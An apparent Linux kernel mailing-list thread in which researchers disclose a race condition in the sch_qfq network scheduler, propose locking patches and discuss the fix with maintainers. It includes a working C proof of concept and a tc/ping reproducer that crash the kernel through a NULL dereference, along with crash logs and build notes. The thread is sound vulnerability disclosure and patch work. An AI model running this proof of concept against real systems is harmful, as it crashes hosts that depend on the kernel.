> [    1.081426] RIP: 0010:qfq_dump_class+0x7f/0x120
> [    1.081700] Code: 2b 95 ff 85 c0 0f 88 a3 00 00 00 4d 85 e4 0f 84 9a 00 00 00 48 8b 45 68 48 8d 4c 24 04 ba 04 00 00 00 48 89 df be 01 00 00 00 <8b> 40 28 89 44 24 04 e8 c5 2b 95 ff 85 c0 75 5b 48 8b 45 68 48 8d
> [    1.082747] RSP: 0018:ffffc900004975b0 EFLAGS: 00010282
> [    1.083050] RAX: 0000000000000000 RBX: ffff8881013e7100 RCX: ffffc900004975b4
> [    1.083447] RDX: 0000000000000004 RSI: 0000000000000001 RDI: ffff8881013e7100
> [    1.083846] RBP: ffff888100b90380 R08: 0000000000000014 R09: ffff88810177e030
> [    1.084238] R10: 00000000000381a0 R11: ffff888101fd8000 R12: ffff88810177e02c
> [    1.084645] R13: ffff88810177e000 R14: ffffffff82d662a0 R15: ffff888101fd8000
> [    1.085072] FS:  00000000198fe3c0(0000) GS:ffff88811c500000(0000) knlGS:0000000000000000
> [    1.085557] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [    1.085888] CR2: 0000000000000028 CR3: 000000010168e000 CR4: 0000000000750ee0
> [    1.086329] PKRU: 55555554
> [    1.086491] Call Trace:
> [    1.086645]  <TASK>
> [    1.086777]  tc_fill_tclass+0x145/0x240
> [    1.087008]  tclass_notify.constprop.0+0x6a/0xd0
> [    1.087275]  tc_ctl_tclass+0x3bc/0x5a0
> [    1.087496]  rtnetlink_rcv_msg+0x14e/0x3d0
> [    1.087734]  ? kmem_cache_alloc_node+0x4b/0x520
> [    1.088011]  ? __pfx_rtnetlink_rcv_msg+0x10/0x10
> [    1.088281]  netlink_rcv_skb+0x57/0x100
> [    1.088506]  netlink_unicast+0x247/0x390
> [    1.088733]  netlink_sendmsg+0x250/0x4d0
> [    1.088964]  sock_write_iter+0x199/0x1a0
> [    1.089192]  vfs_write+0x393/0x440
> [    1.089396]  ksys_write+0xb7/0xf0
> [    1.089591]  do_syscall_64+0x5e/0x90
> [    1.089801]  ? do_syscall_64+0x6a/0x90
> [    1.090022]  ? netlink_rcv_skb+0x84/0x100
> [    1.090254]  ? kmem_cache_free+0x1e/0x360
> [    1.090484]  ? kmem_cache_free+0x1e/0x360
> [    1.090713]  ? netlink_unicast+0x252/0x390
> [    1.090953]  ? netlink_sendmsg+0x25d/0x4d0
> [    1.091189]  ? sock_write_iter+0x199/0x1a0
> [    1.091425]  ? vfs_write+0x393/0x440
> [    1.091633]  ? exit_to_user_mode_prepare+0x1a/0x150
> [    1.091915]  ? syscall_exit_to_user_mode+0x27/0x40
> [    1.092190]  ? do_syscall_64+0x6a/0x90
> [    1.092407]  ? exit_to_user_mode_prepare+0x1a/0x150
> [    1.092686]  ? syscall_exit_to_user_mode+0x27/0x40
> [    1.092962]  ? do_syscall_64+0x6a/0x90
> [    1.093180]  ? do_syscall_64+0x6a/0x90
> [    1.093397]  ? clear_bhb_loop+0x60/0xb0
> [    1.093620]  ? clear_bhb_loop+0x60/0xb0
> [    1.093842]  ? clear_bhb_loop+0x60/0xb0
> [    1.094066]  ? clear_bhb_loop+0x60/0xb0
> [    1.094287]  ? clear_bhb_loop+0x60/0xb0
> [    1.094508]  entry_SYSCALL_64_after_hwframe+0x78/0xe2
> */
> ```
>
> >
> > cheers,
> > jamal
> >
> >
> > > Thanks,
> > > Xiang Mei

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: sch_qfq: race conditon on qfq_aggregate (net/sched/sch_qfq.c)
  2025-06-30 11:36     ` Jamal Hadi Salim
@ 2025-06-30 18:49       ` Xiang Mei
  2025-06-30 23:09         ` Cong Wang
  2025-07-01 14:02         ` sch_qfq: race conditon on qfq_aggregate (net/sched/sch_qfq.c) Jamal Hadi Salim
  0 siblings, 2 replies; 26+ messages in thread
From: Xiang Mei @ 2025-06-30 18:49 UTC (permalink / raw)
  To: Jamal Hadi Salim; +Cc: security, Linux Kernel Network Developers, Cong Wang

Thank you very much for your time. We've re-tested the PoC and
confirmed it works on the latest kernels (6.12.35, 6.6.95, and
6.16-rc4).

To help with reproduction, here are a few notes that might be useful:
1. The QFQ scheduler needs to be compiled into the kernel:
    $ scripts/config --enable CONFIG_NET_SCHED
    $ scripts/config --enable CONFIG_NET_SCH_QFQ
2. Since this is a race condition, the test environment should have at
least two cores (e.g., -smp cores=2 for QEMU).
3. The PoC was compiled using: `gcc ./poc.c -o ./poc  -w --static`
4. Before running the PoC, please check that the network interface
"lo" is in the "up" state.

Appreciate your feedback and patience.

Best regards,
Xiang Mei


On Mon, Jun 30, 2025 at 4:36 AM Jamal Hadi Salim <jhs@mojatatu.com> wrote:
>
> On Sun, Jun 29, 2025 at 11:11 PM Xiang Mei <xmei5@asu.edu> wrote:
> >
> > On Sun, Jun 29, 2025 at 10:28:12AM -0400, Jamal Hadi Salim wrote:
> > > On Sun, Jun 29, 2025 at 3:13 AM Xiang Mei <xmei5@asu.edu> wrote:
> > > >
> > > > Linux Kernel Security Team,
> > > >
> > > > We are writing to bring to your attention a race condition vulnerability in net/sched/sch_qfq.c.
> > > >
> > > > In function qfq_delete_class, the line `qfq_destroy_class(sch, cl);` is outside the protection of ` sch_tree_lock`, so any operation on agg could lead to a race condition vulnerability. For example, we can get a UAF by racing it with qfq_change_agg in qfq_enqueue.
> > > >
> > > > We verified it on v6.6.94 and exploited it in kernelCTF cos-109-17800.519.32.
> > > > A temporal fix could be
> > > > ```c
> > > > @@ -558,10 +562,9 @@ static int qfq_delete_class(struct Qdisc *sch, unsigned long arg,
> > > >
> > > >  qdisc_purge_queue(cl->qdisc);
> > > >  qdisc_class_hash_remove(&q->clhash, &cl->common);
> > > > -
> > > > +        qfq_destroy_class(sch, cl);
> > > >  sch_tree_unlock(sch);
> > > >
> > > > -       qfq_destroy_class(sch, cl);
> > > >  return 0;
> > > >  }
> > > > ```
> > > >
> > > > But this only avoids the exploitation. There are other places to exploit the vulnerability with a General Protection (usually null-deref). We found two places that can crash the kernel:
> > > >
> > > > 1. When modifying an existing class in  qfq_change_class, the reads of cl->agg->weight or cl->agg->lmax could lead to GPs.
> > > > 2. Reads of agg content in qfq_dump_class could lead to GPs.
> > > >
> > > > These reads of the agg structure may require `RCU` or `lock` to protect.
> > > >
> > > > Looking forward to hearing from you and discussing the patching.
> > > >
> > >
> > >
> > > Please partake in the discussion to fix this, your other issue and
> > > others on the netdev list, start with this thread:
> > > https://lore.kernel.org/netdev/aF847kk6H+kr5kIV@pop-os.localdomain/
> >
> > Thanks so much for your time and the helpful information.
> >
> > Here is a potential patch to this vulnerability:
> >
> > sch_lock was used to protect the read/write options of aggs. The
> > lock may influence the performance of the scheduler, and RCU could also
> > be a patch option.
> >
>
>
> I did test your earlier repro and could not create the issue. I dont
> have time right now, but are you sure this new repro can create the
> issue?
>
> cheers,
> jamal
>
> > ```
> > From e64c4f5d662dc3f3c5dedf4b755a151d826d7f70 Mon Sep 17 00:00:00 2001
> > From: n132 <xmei5@asu.edu>
> > Date: Sun, 29 Jun 2025 16:26:43 -0700
> > Subject: [PATCH] net/sched: sch_qfq: Fix qfq_aggregate race condition
> >
> > Apply sch_lock when reading or modifying agg data to prevent race conditions between class options and enqueue.
> > ---
> >  net/sched/sch_qfq.c | 30 +++++++++++++++++++++---------
> >  1 file changed, 21 insertions(+), 9 deletions(-)
> >
> > diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
> > index bf1282cb22eb..dc77ffc01bb3 100644
> > --- a/net/sched/sch_qfq.c
> > +++ b/net/sched/sch_qfq.c
> > @@ -412,7 +412,7 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
> >         bool existing = false;
> >         struct nlattr *tb[TCA_QFQ_MAX + 1];
> >         struct qfq_aggregate *new_agg = NULL;
> > -       u32 weight, lmax, inv_w;
> > +       u32 weight, lmax, inv_w, old_weight, old_lmax;
> >         int err;
> >         int delta_w;
> >
> > @@ -443,12 +443,16 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
> >         inv_w = ONE_FP / weight;
> >         weight = ONE_FP / inv_w;
> >
> > -       if (cl != NULL &&
> > -          lmax == cl->agg->lmax &&
> > -          weight == cl->agg->class_weight)
> > -               return 0; /* nothing to change */
> > +       if(cl != NULL){
> > +               sch_tree_lock(sch);
> > +               old_weight = cl->agg->class_weight;
> > +               old_lmax   = cl->agg->lmax;
> > +               sch_tree_unlock(sch);
> > +               if (lmax == old_lmax && weight == old_weight)
> > +                       return 0; /* nothing to change */
> > +       }
> >
> > -       delta_w = weight - (cl ? cl->agg->class_weight : 0);
> > +       delta_w = weight - (cl ? old_weight : 0);
> >
> >         if (q->wsum + delta_w > QFQ_MAX_WSUM) {
> >                 NL_SET_ERR_MSG_FMT_MOD(extack,
> > @@ -555,10 +559,10 @@ static int qfq_delete_class(struct Qdisc *sch, unsigned long arg,
> >
> >         qdisc_purge_queue(cl->qdisc);
> >         qdisc_class_hash_remove(&q->clhash, &cl->common);
> > +       qfq_destroy_class(sch, cl);
> >
> >         sch_tree_unlock(sch);
> >
> > -       qfq_destroy_class(sch, cl);
> >         return 0;
> >  }
> >
> > @@ -625,6 +629,8 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
> >  {
> >         struct qfq_class *cl = (struct qfq_class *)arg;
> >         struct nlattr *nest;
> > +       u32 class_weight;
> > +       u32 lmax;
> >
> >         tcm->tcm_parent = TC_H_ROOT;
> >         tcm->tcm_handle = cl->common.classid;
> > @@ -633,8 +639,12 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
> >         nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
> >         if (nest == NULL)
> >                 goto nla_put_failure;
> > -       if (nla_put_u32(skb, TCA_QFQ_WEIGHT, cl->agg->class_weight) ||
> > -          nla_put_u32(skb, TCA_QFQ_LMAX, cl->agg->lmax))
> > +       sch_tree_lock(sch);
> > +       class_weight = cl->agg->class_weight;
> > +       lmax         = cl->agg->lmax;
> > +       sch_tree_unlock(sch);
> > +       if (nla_put_u32(skb, TCA_QFQ_WEIGHT, class_weight) ||
> > +          nla_put_u32(skb, TCA_QFQ_LMAX, lmax))
> >                 goto nla_put_failure;
> >         return nla_nest_end(skb, nest);
> >
> > @@ -651,8 +661,10 @@ static int qfq_dump_class_stats(struct Qdisc *sch, unsigned long arg,
> >
> >         memset(&xstats, 0, sizeof(xstats));
> >
> > +       sch_tree_lock(sch);
> >         xstats.weight = cl->agg->class_weight;
> >         xstats.lmax = cl->agg->lmax;
> > +       sch_tree_unlock(sch);
> >
> >         if (gnet_stats_copy_basic(d, NULL, &cl->bstats, true) < 0 ||
> >            gnet_stats_copy_rate_est(d, &cl->rate_est) < 0 ||
> > --
> > 2.43.0
> > ```
> >
> > Here is the PoC triggering the race condition for your reference:
> >
> > ```c
> > #include <stdio.h>
> > #include <sys/socket.h>
> > #include <linux/rtnetlink.h>
> > #include <linux/pkt_sched.h>
> > #include <linux/if_arp.h>
> > struct tf_msg {
> >     struct nlmsghdr nlh;
> >     struct tcmsg tcm;
> > #define TC_DATA_LEN 0x200
> >     char attrbuf[TC_DATA_LEN];
> > };
> > struct if_msg {
> >     struct nlmsghdr nlh;
> >     struct ifinfomsg ifi;
> > };
> > typedef unsigned int u32;
> > int nl, inet_sock_fd;
> > char *  msgQdiscCreate;
> > char *  tclass_0x20001_create;
> > char *  tclass_0x20002_create;
> > char *  tclass_0x20001_reset;
> >
> > unsigned short add_rtattr (unsigned long rta_addr, unsigned short type, unsigned short len, char *data) {
> >     struct rtattr *rta = (struct rtattr *)rta_addr;
> >     rta->rta_type = type;
> >     rta->rta_len = RTA_LENGTH(len);
> >     memcpy(RTA_DATA(rta), data, len);
> >     return rta->rta_len;
> > }
> > int initNL(){
> >     struct if_msg if_up_msg = {
> >         {
> >             .nlmsg_len = 32,
> >             .nlmsg_type = RTM_NEWLINK,
> >             .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK,
> >         },
> >         {
> >             .ifi_family = AF_UNSPEC,
> >             .ifi_type = ARPHRD_NETROM,
> >             .ifi_index = 1,
> >             .ifi_flags = IFF_UP,
> >             .ifi_change = 1,
> >         },
> >     };
> >     int nl_sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
> >     if_up_msg.ifi.ifi_index = if_nametoindex("lo");
> >     NLMsgSend(nl_sock_fd, (struct tf_msg *)(&if_up_msg));
> >     return nl_sock_fd;
> > }
> > void NLMsgSend (int sock, struct tf_msg *m) {
> >     struct {
> >         struct nlmsghdr nh;
> >         struct nlmsgerr ne;
> >     } ack;
> >     write(sock, m, m->nlh.nlmsg_len);
> >     read(sock , &ack, sizeof(ack));
> > }
> > /* Prepared Values*/
> > void init_loopbacksend (u32 prio) {
> >     struct sockaddr iaddr = { AF_INET };
> >     inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0);
> >     int res = setsockopt(inet_sock_fd, SOL_SOCKET, SO_PRIORITY, &prio, sizeof(prio));
> >     connect(inet_sock_fd, &iaddr, sizeof(iaddr));
> > }
> >
> > /* Trafic control for netlink */
> > void init_tf_msg (struct tf_msg *m) {
> >     m->nlh.nlmsg_len    = NLMSG_LENGTH(sizeof(m->tcm));
> >     m->nlh.nlmsg_type   = 0;    // Default Value
> >     m->nlh.nlmsg_flags  = NLM_F_REQUEST | NLM_F_ACK;
> >     m->nlh.nlmsg_seq    = 0;    // Default Value
> >     m->nlh.nlmsg_pid    = 0;    // Default Value
> >
> >     // tcmsg
> >     m->tcm.tcm_family   = PF_UNSPEC;
> >     m->tcm.tcm_ifindex  = if_nametoindex("lo");
> >     m->tcm.tcm_handle   = 0;    // Default Value
> >     m->tcm.tcm_parent   = -1;   // Default Value for no parent
> >     m->tcm.tcm_info     = 0;    // Default Value
> > }
> >
> > struct tf_msg * classGet(u32 classid){
> >     struct tf_msg *m = calloc(1,sizeof(struct tf_msg));
> >     init_tf_msg(m);
> >     m->nlh.nlmsg_type        = RTM_GETTCLASS;
> >     m->tcm.tcm_handle        = classid;
> >     return m;
> > }
> > struct tf_msg * qfqQdiscAdd(u32 handle, u32 parent) {
> >     struct tf_msg *m = calloc(1,sizeof(struct tf_msg));
> >     init_tf_msg(m);
> >     m->nlh.nlmsg_type    = RTM_NEWQDISC;
> >     m->nlh.nlmsg_flags   |= NLM_F_CREATE;
> >     m->tcm.tcm_handle    = handle;
> >     m->tcm.tcm_parent    = parent;
> >     m->nlh.nlmsg_len     += NLMSG_ALIGN(add_rtattr((size_t)m + NLMSG_ALIGN(m->nlh.nlmsg_len), TCA_KIND, strlen("qfq") + 1, "qfq"));
> >     return m;
> > }
> > struct tf_msg * qfqClassAdd(int type, u32 classid,u32 val){
> >     struct tf_msg *m = calloc(1,sizeof(struct tf_msg));
> >     init_tf_msg(m);
> >     m->nlh.nlmsg_type       = RTM_NEWTCLASS;
> >     m->tcm.tcm_parent       = 0;
> >     m->tcm.tcm_handle       = classid;
> >     m->nlh.nlmsg_flags      |= NLM_F_CREATE;
> >     m->nlh.nlmsg_len        += NLMSG_ALIGN(add_rtattr((size_t)m + NLMSG_ALIGN(m->nlh.nlmsg_len), TCA_KIND, strlen("qfq") + 1, "qfq"));
> >
> >     struct rtattr *opts     = (struct rtattr *)((size_t)m + NLMSG_ALIGN(m->nlh.nlmsg_len));
> >     opts->rta_type          = TCA_OPTIONS;
> >     opts->rta_len           = RTA_LENGTH(0);
> >
> >     if(type == TCA_QFQ_LMAX)
> >         opts->rta_len += RTA_ALIGN(add_rtattr((size_t)opts + opts->rta_len, TCA_QFQ_LMAX, sizeof(val), (char *)&val));
> >     else if(type == TCA_QFQ_WEIGHT)
> >         opts->rta_len += RTA_ALIGN(add_rtattr((size_t)opts + opts->rta_len, TCA_QFQ_WEIGHT, sizeof(val), (char *)&val));
> >     m->nlh.nlmsg_len += NLMSG_ALIGN(opts->rta_len);
> >     return m;
> > }
> > void initContext(){
> >     msgQdiscCreate =        qfqQdiscAdd(0x20000,-1);
> >     tclass_0x20001_reset  = tclass_0x20001_create = qfqClassAdd(TCA_QFQ_LMAX,0x20001,0x200);
> >     tclass_0x20002_create = qfqClassAdd(TCA_QFQ_LMAX,0x20002,0x400);
> > }
> > int main(){
> >     initContext();
> >     nl = initNL();
> >     NLMsgSend(nl,msgQdiscCreate);
> >     NLMsgSend(nl,tclass_0x20001_create);
> >     NLMsgSend(nl,tclass_0x20002_create);
> >     init_loopbacksend(0x20001);
> >     if(fork()){
> >         while(1){
> >             write(inet_sock_fd, "", 0x400-42); // upgrade
> >             NLMsgSend(nl,tclass_0x20001_reset);
> >         }
> >     }else{
> >         char * pay = classGet(0x20001);
> >         while(1)
> >             NLMsgSend(nl,pay);
> >     }
> > }
> >
> > /*
> > [    1.078863] BUG: kernel NULL pointer dereference, address: 0000000000000028
> > [    1.079284] #PF: supervisor read access in kernel mode
> > [    1.079580] #PF: error_code(0x0000) - not-present page
> > [    1.079882] PGD 101e10067 P4D 101e10067 PUD 101e11067 PMD 0
> > [    1.080211] Oops: 0000 [#1] PREEMPT SMP NOPTI
> > [    1.080466] CPU: 1 PID: 117 Comm: exploit Not tainted 6.6.94 #1
> > [    1.080873] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
> > [    1.081426] RIP: 0010:qfq_dump_class+0x7f/0x120
> > [    1.081700] Code: 2b 95 ff 85 c0 0f 88 a3 00 00 00 4d 85 e4 0f 84 9a 00 00 00 48 8b 45 68 48 8d 4c 24 04 ba 04 00 00 00 48 89 df be 01 00 00 00 <8b> 40 28 89 44 24 04 e8 c5 2b 95 ff 85 c0 75 5b 48 8b 45 68 48 8d
> > [    1.082747] RSP: 0018:ffffc900004975b0 EFLAGS: 00010282
> > [    1.083050] RAX: 0000000000000000 RBX: ffff8881013e7100 RCX: ffffc900004975b4
> > [    1.083447] RDX: 0000000000000004 RSI: 0000000000000001 RDI: ffff8881013e7100
> > [    1.083846] RBP: ffff888100b90380 R08: 0000000000000014 R09: ffff88810177e030
> > [    1.084238] R10: 00000000000381a0 R11: ffff888101fd8000 R12: ffff88810177e02c
> > [    1.084645] R13: ffff88810177e000 R14: ffffffff82d662a0 R15: ffff888101fd8000
> > [    1.085072] FS:  00000000198fe3c0(0000) GS:ffff88811c500000(0000) knlGS:0000000000000000
> > [    1.085557] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> > [    1.085888] CR2: 0000000000000028 CR3: 000000010168e000 CR4: 0000000000750ee0
> > [    1.086329] PKRU: 55555554
> > [    1.086491] Call Trace:
> > [    1.086645]  <TASK>
> > [    1.086777]  tc_fill_tclass+0x145/0x240
> > [    1.087008]  tclass_notify.constprop.0+0x6a/0xd0
> > [    1.087275]  tc_ctl_tclass+0x3bc/0x5a0
> > [    1.087496]  rtnetlink_rcv_msg+0x14e/0x3d0
> > [    1.087734]  ? kmem_cache_alloc_node+0x4b/0x520
> > [    1.088011]  ? __pfx_rtnetlink_rcv_msg+0x10/0x10
> > [    1.088281]  netlink_rcv_skb+0x57/0x100
> > [    1.088506]  netlink_unicast+0x247/0x390
> > [    1.088733]  netlink_sendmsg+0x250/0x4d0
> > [    1.088964]  sock_write_iter+0x199/0x1a0
> > [    1.089192]  vfs_write+0x393/0x440
> > [    1.089396]  ksys_write+0xb7/0xf0
> > [    1.089591]  do_syscall_64+0x5e/0x90
> > [    1.089801]  ? do_syscall_64+0x6a/0x90
> > [    1.090022]  ? netlink_rcv_skb+0x84/0x100
> > [    1.090254]  ? kmem_cache_free+0x1e/0x360
> > [    1.090484]  ? kmem_cache_free+0x1e/0x360
> > [    1.090713]  ? netlink_unicast+0x252/0x390
> > [    1.090953]  ? netlink_sendmsg+0x25d/0x4d0
> > [    1.091189]  ? sock_write_iter+0x199/0x1a0
> > [    1.091425]  ? vfs_write+0x393/0x440
> > [    1.091633]  ? exit_to_user_mode_prepare+0x1a/0x150
> > [    1.091915]  ? syscall_exit_to_user_mode+0x27/0x40
> > [    1.092190]  ? do_syscall_64+0x6a/0x90
> > [    1.092407]  ? exit_to_user_mode_prepare+0x1a/0x150
> > [    1.092686]  ? syscall_exit_to_user_mode+0x27/0x40
> > [    1.092962]  ? do_syscall_64+0x6a/0x90
> > [    1.093180]  ? do_syscall_64+0x6a/0x90
> > [    1.093397]  ? clear_bhb_loop+0x60/0xb0
> > [    1.093620]  ? clear_bhb_loop+0x60/0xb0
> > [    1.093842]  ? clear_bhb_loop+0x60/0xb0
> > [    1.094066]  ? clear_bhb_loop+0x60/0xb0
> > [    1.094287]  ? clear_bhb_loop+0x60/0xb0
> > [    1.094508]  entry_SYSCALL_64_after_hwframe+0x78/0xe2
> > */
> > ```
> >
> > >
> > > cheers,
> > > jamal
> > >
> > >
> > > > Thanks,
> > > > Xiang Mei

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: sch_qfq: race conditon on qfq_aggregate (net/sched/sch_qfq.c)
  2025-06-30 18:49       ` Xiang Mei
@ 2025-06-30 23:09         ` Cong Wang
  2025-07-01  2:52           ` Xiang Mei
  2025-07-02 19:41           ` Xiang Mei
  2025-07-01 14:02         ` sch_qfq: race conditon on qfq_aggregate (net/sched/sch_qfq.c) Jamal Hadi Salim
  1 sibling, 2 replies; 26+ messages in thread
From: Cong Wang @ 2025-06-30 23:09 UTC (permalink / raw)
  To: Xiang Mei; +Cc: Jamal Hadi Salim, security, Linux Kernel Network Developers

Hi Xiang,

On Mon, Jun 30, 2025 at 11:49:02AM -0700, Xiang Mei wrote:
> Thank you very much for your time. We've re-tested the PoC and
> confirmed it works on the latest kernels (6.12.35, 6.6.95, and
> 6.16-rc4).
> 
> To help with reproduction, here are a few notes that might be useful:
> 1. The QFQ scheduler needs to be compiled into the kernel:
>     $ scripts/config --enable CONFIG_NET_SCHED
>     $ scripts/config --enable CONFIG_NET_SCH_QFQ
> 2. Since this is a race condition, the test environment should have at
> least two cores (e.g., -smp cores=2 for QEMU).
> 3. The PoC was compiled using: `gcc ./poc.c -o ./poc  -w --static`
> 4. Before running the PoC, please check that the network interface
> "lo" is in the "up" state.
> 
> Appreciate your feedback and patience.

Thanks for your detailed report and efforts on reproducing it on the
latest kernel.

I think we may have a bigger problem here, the sch_tree_lock() is to lock
the datapath, I doubt we really need to use sch_tree_lock() for
qfq->agg. _If_ it is only for control path, using RTNL lock + RCU lock
should be sufficient. We need a deeper review on the locking there.

Regards,
Cong

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: sch_qfq: race conditon on qfq_aggregate (net/sched/sch_qfq.c)
  2025-06-30 23:09         ` Cong Wang
@ 2025-07-01  2:52           ` Xiang Mei
  2025-07-02 19:41           ` Xiang Mei
  1 sibling, 0 replies; 26+ messages in thread
From: Xiang Mei @ 2025-07-01  2:52 UTC (permalink / raw)
  To: Cong Wang; +Cc: Jamal Hadi Salim, security, Linux Kernel Network Developers

On Mon, Jun 30, 2025 at 04:09:35PM -0700, Cong Wang wrote:
> Hi Xiang,
> 
> On Mon, Jun 30, 2025 at 11:49:02AM -0700, Xiang Mei wrote:
> > Thank you very much for your time. We've re-tested the PoC and
> > confirmed it works on the latest kernels (6.12.35, 6.6.95, and
> > 6.16-rc4).
> > 
> > To help with reproduction, here are a few notes that might be useful:
> > 1. The QFQ scheduler needs to be compiled into the kernel:
> >     $ scripts/config --enable CONFIG_NET_SCHED
> >     $ scripts/config --enable CONFIG_NET_SCH_QFQ
> > 2. Since this is a race condition, the test environment should have at
> > least two cores (e.g., -smp cores=2 for QEMU).
> > 3. The PoC was compiled using: `gcc ./poc.c -o ./poc  -w --static`
> > 4. Before running the PoC, please check that the network interface
> > "lo" is in the "up" state.
> > 
> > Appreciate your feedback and patience.
> 
> Thanks for your detailed report and efforts on reproducing it on the
> latest kernel.
> 
> I think we may have a bigger problem here, the sch_tree_lock() is to lock
> the datapath, I doubt we really need to use sch_tree_lock() for
> qfq->agg. _If_ it is only for control path, using RTNL lock + RCU lock
> should be sufficient. We need a deeper review on the locking there.


I agree with your point and that's also my initial plan to use RCU lock 
to solve this issue but I was concerned about the code complexity since 
applying RCU lock on agg objections would be a verbose change on the QFQ 
scheduler. I'll try to make an RCU patch as soon as possible.

Thanks,
Xiang

> 
> Regards,
> Cong

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: sch_qfq: race conditon on qfq_aggregate (net/sched/sch_qfq.c)
  2025-06-30 18:49       ` Xiang Mei
  2025-06-30 23:09         ` Cong Wang
@ 2025-07-01 14:02         ` Jamal Hadi Salim
  1 sibling, 0 replies; 26+ messages in thread
From: Jamal Hadi Salim @ 2025-07-01 14:02 UTC (permalink / raw)
  To: Xiang Mei; +Cc: security, Linux Kernel Network Developers, Cong Wang

On Mon, Jun 30, 2025 at 2:49 PM Xiang Mei <xmei5@asu.edu> wrote:
>
> Thank you very much for your time. We've re-tested the PoC and
> confirmed it works on the latest kernels (6.12.35, 6.6.95, and
> 6.16-rc4).
>
> To help with reproduction, here are a few notes that might be useful:
> 1. The QFQ scheduler needs to be compiled into the kernel:
>     $ scripts/config --enable CONFIG_NET_SCHED
>     $ scripts/config --enable CONFIG_NET_SCH_QFQ
> 2. Since this is a race condition, the test environment should have at
> least two cores (e.g., -smp cores=2 for QEMU).
> 3. The PoC was compiled using: `gcc ./poc.c -o ./poc  -w --static`
> 4. Before running the PoC, please check that the network interface
> "lo" is in the "up" state.
>

Yes, for this POC i can confirm activates the issue.

Sorry, I actually meant your other/different patch/issue earlier which
has the following reproducer:
tc qdisc del dev lo root 2>/dev/null
tc qdisc add dev lo root handle 1: qfq
tc class add dev lo parent 1: classid 1:1 qfq weight 1 maxpkt 1024
tc qdisc add dev lo parent 1:1 handle 10: fq maxrate 1
tc filter add dev lo protocol all parent 1: prio 1 basic \
  match "meta(priority eq 0x20001)" \
  flowid 1:1
while true; do ping -c 1 127.0.0.1 > /dev/null; done

Does this reproducer work for you for that example?

cheers,
jamal



> Appreciate your feedback and patience.
>
> Best regards,
> Xiang Mei
>
>
> On Mon, Jun 30, 2025 at 4:36 AM Jamal Hadi Salim <jhs@mojatatu.com> wrote:
> >
> > On Sun, Jun 29, 2025 at 11:11 PM Xiang Mei <xmei5@asu.edu> wrote:
> > >
> > > On Sun, Jun 29, 2025 at 10:28:12AM -0400, Jamal Hadi Salim wrote:
> > > > On Sun, Jun 29, 2025 at 3:13 AM Xiang Mei <xmei5@asu.edu> wrote:
> > > > >
> > > > > Linux Kernel Security Team,
> > > > >
> > > > > We are writing to bring to your attention a race condition vulnerability in net/sched/sch_qfq.c.
> > > > >
> > > > > In function qfq_delete_class, the line `qfq_destroy_class(sch, cl);` is outside the protection of ` sch_tree_lock`, so any operation on agg could lead to a race condition vulnerability. For example, we can get a UAF by racing it with qfq_change_agg in qfq_enqueue.
> > > > >
> > > > > We verified it on v6.6.94 and exploited it in kernelCTF cos-109-17800.519.32.
> > > > > A temporal fix could be
> > > > > ```c
> > > > > @@ -558,10 +562,9 @@ static int qfq_delete_class(struct Qdisc *sch, unsigned long arg,
> > > > >
> > > > >  qdisc_purge_queue(cl->qdisc);
> > > > >  qdisc_class_hash_remove(&q->clhash, &cl->common);
> > > > > -
> > > > > +        qfq_destroy_class(sch, cl);
> > > > >  sch_tree_unlock(sch);
> > > > >
> > > > > -       qfq_destroy_class(sch, cl);
> > > > >  return 0;
> > > > >  }
> > > > > ```
> > > > >
> > > > > But this only avoids the exploitation. There are other places to exploit the vulnerability with a General Protection (usually null-deref). We found two places that can crash the kernel:
> > > > >
> > > > > 1. When modifying an existing class in  qfq_change_class, the reads of cl->agg->weight or cl->agg->lmax could lead to GPs.
> > > > > 2. Reads of agg content in qfq_dump_class could lead to GPs.
> > > > >
> > > > > These reads of the agg structure may require `RCU` or `lock` to protect.
> > > > >
> > > > > Looking forward to hearing from you and discussing the patching.
> > > > >
> > > >
> > > >
> > > > Please partake in the discussion to fix this, your other issue and
> > > > others on the netdev list, start with this thread:
> > > > https://lore.kernel.org/netdev/aF847kk6H+kr5kIV@pop-os.localdomain/
> > >
> > > Thanks so much for your time and the helpful information.
> > >
> > > Here is a potential patch to this vulnerability:
> > >
> > > sch_lock was used to protect the read/write options of aggs. The
> > > lock may influence the performance of the scheduler, and RCU could also
> > > be a patch option.
> > >
> >
> >
> > I did test your earlier repro and could not create the issue. I dont
> > have time right now, but are you sure this new repro can create the
> > issue?
> >
> > cheers,
> > jamal
> >
> > > ```
> > > From e64c4f5d662dc3f3c5dedf4b755a151d826d7f70 Mon Sep 17 00:00:00 2001
> > > From: n132 <xmei5@asu.edu>
> > > Date: Sun, 29 Jun 2025 16:26:43 -0700
> > > Subject: [PATCH] net/sched: sch_qfq: Fix qfq_aggregate race condition
> > >
> > > Apply sch_lock when reading or modifying agg data to prevent race conditions between class options and enqueue.
> > > ---
> > >  net/sched/sch_qfq.c | 30 +++++++++++++++++++++---------
> > >  1 file changed, 21 insertions(+), 9 deletions(-)
> > >
> > > diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
> > > index bf1282cb22eb..dc77ffc01bb3 100644
> > > --- a/net/sched/sch_qfq.c
> > > +++ b/net/sched/sch_qfq.c
> > > @@ -412,7 +412,7 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
> > >         bool existing = false;
> > >         struct nlattr *tb[TCA_QFQ_MAX + 1];
> > >         struct qfq_aggregate *new_agg = NULL;
> > > -       u32 weight, lmax, inv_w;
> > > +       u32 weight, lmax, inv_w, old_weight, old_lmax;
> > >         int err;
> > >         int delta_w;
> > >
> > > @@ -443,12 +443,16 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
